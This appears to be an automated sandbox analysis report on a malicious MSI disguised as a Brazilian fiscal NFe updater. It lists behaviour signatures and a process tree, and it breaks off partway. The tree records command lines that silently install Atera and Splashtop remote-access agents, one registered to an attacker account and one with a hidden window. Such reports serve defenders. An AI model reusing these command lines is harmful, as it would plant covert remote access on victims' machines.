Overview

overview

10

Static

static

10

Atualizado...2).msi

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    08/11/2024, 13:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Atualizador_Fiscal_NFe(2).msi

  • Size

    2.9MB

  • MD5

    61b54e1bd417282f38e537804fd1d1db

  • SHA1

    e74d97884bc23404c5860e5f58b5d57242c9c4bc

  • SHA256

    fc706bcf6b6c9c787c723bd168c74ca7ebc228962f78b6f57225b7a45c2dc5e7

  • SHA512

    6d6118c470549949a32885a749e38085f619ae64d68b473ec9bcb13007d25606df78ef67072bad46606fc90fe5c89488b52df64c6401656fac4f432e51b4217b

  • SSDEEP

    49152:j+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:j+lUlz9FKbsodq0YaH7ZPxMb8tT

Score
10/10
ateraagentbootkitdiscoverypersistencephishingprivilege_escalationratupx

Malware Config

Signatures

  • AteraAgent

    AteraAgent is a remote monitoring and management tool.

    ratateraagent
  • Ateraagent family
    ateraagent
  • Detects AteraAgent 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • A potential corporate email address has been identified in the URL: vlibras-portal@dev
    phishing
  • Downloads MZ/PE file
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 44 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • UPX packed file 25 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Executes dropped EXE 64 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Loads dropped DLL 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Time Discovery 1 TTPs 4 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 13 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 30 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Atualizador_Fiscal_NFe(2).msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1112
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3180
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3224
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding BEF56E700DB29CDA43A55A7959F9C70C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2060
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Windows\Installer\MSI9441.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240620859 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
        3⤵
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:416
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Windows\Installer\MSI9888.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240621703 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
        3⤵
        • Blocklisted process makes network request
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1580
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Windows\Installer\MSI9CBF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240622796 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
        3⤵
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1328
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Windows\Installer\MSIA918.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240625968 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
        3⤵
        • Blocklisted process makes network request
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4896
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 09C602E86618CE8D9010B538D52CBDF9 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5084
      • C:\Windows\SysWOW64\NET.exe
        "NET" STOP AteraAgent
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 STOP AteraAgent
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2676
      • C:\Windows\SysWOW64\TaskKill.exe
        "TaskKill.exe" /f /im AteraAgent.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3476
    • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
      "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="[email protected]" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000N8afVIAR" /AgentId="ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e"
      2⤵
      • Drops file in System32 directory
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      PID:4164
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 08F88ABF6BC70D89BF30BBC1B277B3D2 E Global\MSI0000
      2⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1904
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B2319BB1-2656-427C-9AC2-421D4A5DA56B}
        3⤵
        • Executes dropped EXE
        PID:3584
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{449DB1B3-F253-47CE-8F3C-A4A787B6BFEC}
        3⤵
        • Executes dropped EXE
        PID:1328
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C3069275-869C-46C5-A125-58689A1F03D2}
        3⤵
        • Executes dropped EXE
        PID:4732
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FFCB7B1A-C1C9-4C6E-9EC6-AE23B52DB962}
        3⤵
        • Executes dropped EXE
        PID:1828
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{A38E5044-217B-4051-9224-3BB1A2E19F57}
        3⤵
        • Executes dropped EXE
        PID:1292
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{190D495A-7FE9-495D-91B9-369A78EC5F97}
        3⤵
        • Executes dropped EXE
        PID:2692
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6ACFCFFC-6644-4CAB-A069-A4B2F1B918A1}
        3⤵
        • Executes dropped EXE
        PID:1140
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6D6B3DDA-172B-4EED-912F-37C194263C45}
        3⤵
        • Executes dropped EXE
        PID:3024
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{59885F2E-0C18-4590-B3C6-98226467FC2D}
        3⤵
        • Executes dropped EXE
        PID:3724
      • C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe
        C:\Windows\TEMP\{EE9ACF66-4295-4608-93B5-CABFA7E1A719}\_isE530.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8AD38822-8BC2-4A85-B82B-6AB96D916113}
        3⤵
        • Executes dropped EXE
        PID:3652
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1752
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRServer.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:5112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4640
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRApp.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:1176
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRAppPB.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1328
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRAppPB.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:668
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRFeature.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2128
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRFeature.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:4996
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRFeatMini.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4496
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRFeatMini.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:4540
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRManager.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3724
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRManager.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:1308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRAgent.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5112
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRAgent.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:3088
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRChat.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3896
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRChat.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:476
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRAudioChat.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2444
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRAudioChat.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:2212
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRVirtualDisplay.exe /T"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1576
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill.exe /F /IM SRVirtualDisplay.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:3024
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B44BD145-7B11-4422-A313-ACAF2BFA6A34}
        3⤵
        • Executes dropped EXE
        PID:1176
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2E3B8FF9-C437-465B-A93E-C192FD99FAA9}
        3⤵
        • Executes dropped EXE
        PID:3460
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{7ED2794D-ADC1-4A42-887A-CDB3A07B50E3}
        3⤵
        • Executes dropped EXE
        PID:3008
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B37AEDB5-D461-41F9-932E-8C39C1D52C27}
        3⤵
        • Executes dropped EXE
        PID:2160
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4B5C0ED2-8ED5-4909-9B35-05F7B248DC80}
        3⤵
        • Executes dropped EXE
        PID:4492
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6DA40947-0CCB-4F2B-B781-2F40C3FEADB0}
        3⤵
        • Executes dropped EXE
        PID:1108
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{EA175591-6619-4EF7-850B-D2E6EC710209}
        3⤵
        • Executes dropped EXE
        PID:1984
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{13892297-948E-4C60-8BF9-065CDBC87ECA}
        3⤵
        • Executes dropped EXE
        PID:4768
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{321D8615-937C-44AD-AED3-5FAB759183F7}
        3⤵
        • Executes dropped EXE
        PID:2988
      • C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe
        C:\Windows\TEMP\{1339B3D9-1ECE-44E2-9009-B12F388631D9}\_isF05C.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{34F5ABEA-7AE8-475E-8A8D-51EED6D95BBB}
        3⤵
        • Executes dropped EXE
        PID:3588
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{F3EE5859-20FD-4C4D-88D5-16940F196BC9}
        3⤵
        • Executes dropped EXE
        PID:6100
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{3B286B37-6A76-4393-9DB1-FC1898368719}
        3⤵
        • Executes dropped EXE
        PID:6136
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{28D3EC7A-49C9-4BAD-90FF-11879B97B1B9}
        3⤵
        • Executes dropped EXE
        PID:5172
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{7C130B06-D050-4B83-BA1C-92F968A4A9EE}
        3⤵
        • Executes dropped EXE
        PID:5204
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E0FD21F6-ADAF-45C2-B86E-CB58B1180FE6}
        3⤵
        • Executes dropped EXE
        PID:5260
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{06123975-3DA0-4F39-94D4-7273A6084CA3}
        3⤵
        • Executes dropped EXE
        PID:5540
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{DC734155-EECD-417F-A6D0-6CA7332DC48F}
        3⤵
        • Executes dropped EXE
        PID:5620
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{0A6ADB99-5FFE-4FF5-8AF5-D13A9A826CF7}
        3⤵
        • Executes dropped EXE
        PID:5308
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{142CCF51-629D-48E5-B8E2-7F72D714AE76}
        3⤵
        • Executes dropped EXE
        PID:5704
      • C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe
        C:\Windows\TEMP\{C14ADDF9-CC6B-4B15-B316-F673E717D552}\_is220.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{14883F75-966E-4A5C-92FC-F99ACEF20BAA}
        3⤵
        • Executes dropped EXE
        PID:5600
      • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe
        "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe" /P ADDUSERINFO /V "sec_opt=0,confirm_d=0,hidewindow=1"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:6052
      • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe
        "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe" /P USERSESSIONID
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:6132
      • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe
        "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe" /P ST_EVENT
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5264
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /C "C:\Windows\system32\wevtutil.exe" um "C:\ProgramData\Splashtop\Common\Event\stevt_srs_provider.man"
          4⤵
            PID:5588
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /C "C:\Windows\system32\wevtutil.exe" im "C:\ProgramData\Splashtop\Common\Event\stevt_srs_provider.man"
            4⤵
              PID:5724
          • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSelfSignCertUtil.exe
            "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSelfSignCertUtil.exe" -g
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:5916
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{02B04680-E192-451D-8305-57D5C8B00303}
            3⤵
            • Executes dropped EXE
            PID:6080
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{36896AB1-E538-43D2-B94F-9A7E0347416B}
            3⤵
            • Executes dropped EXE
            PID:4064
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B27AC7E4-6716-4AEF-9CF9-F88ED7841AF0}
            3⤵
            • Executes dropped EXE
            PID:6136
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{5B726ECD-5E1D-4259-B7A6-55095A143981}
            3⤵
            • Executes dropped EXE
            PID:5212
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{719438E1-9283-403E-81C2-86EC8C5243BC}
            3⤵
            • Executes dropped EXE
            PID:5256
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{50B7A3F0-CB03-4F09-9D50-FADD2C746565}
            3⤵
            • Executes dropped EXE
            PID:3360
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{006C0C75-1DBF-46DA-AD9F-B8E52DE63AB7}
            3⤵
            • Executes dropped EXE
            PID:5740
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{57334F55-7B1E-4873-8974-D7B233A9710B}
            3⤵
            • Executes dropped EXE
            PID:5756
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4CAF6530-816B-4DB9-943C-3604FBC9FDB2}
            3⤵
            • Executes dropped EXE
            PID:5824
          • C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe
            C:\Windows\TEMP\{FA10A6E9-3B53-433D-83FA-C0148CCFF28C}\_is152D.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{0CE3857D-FE5B-465D-ACF1-607A29D2A3D4}
            3⤵
            • Executes dropped EXE
            PID:5416
          • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe
            "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe" -i
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            PID:5960
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{ADDE2BEC-6967-4B74-952F-C11C50D0894F}
            3⤵
            • Executes dropped EXE
            PID:5216
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
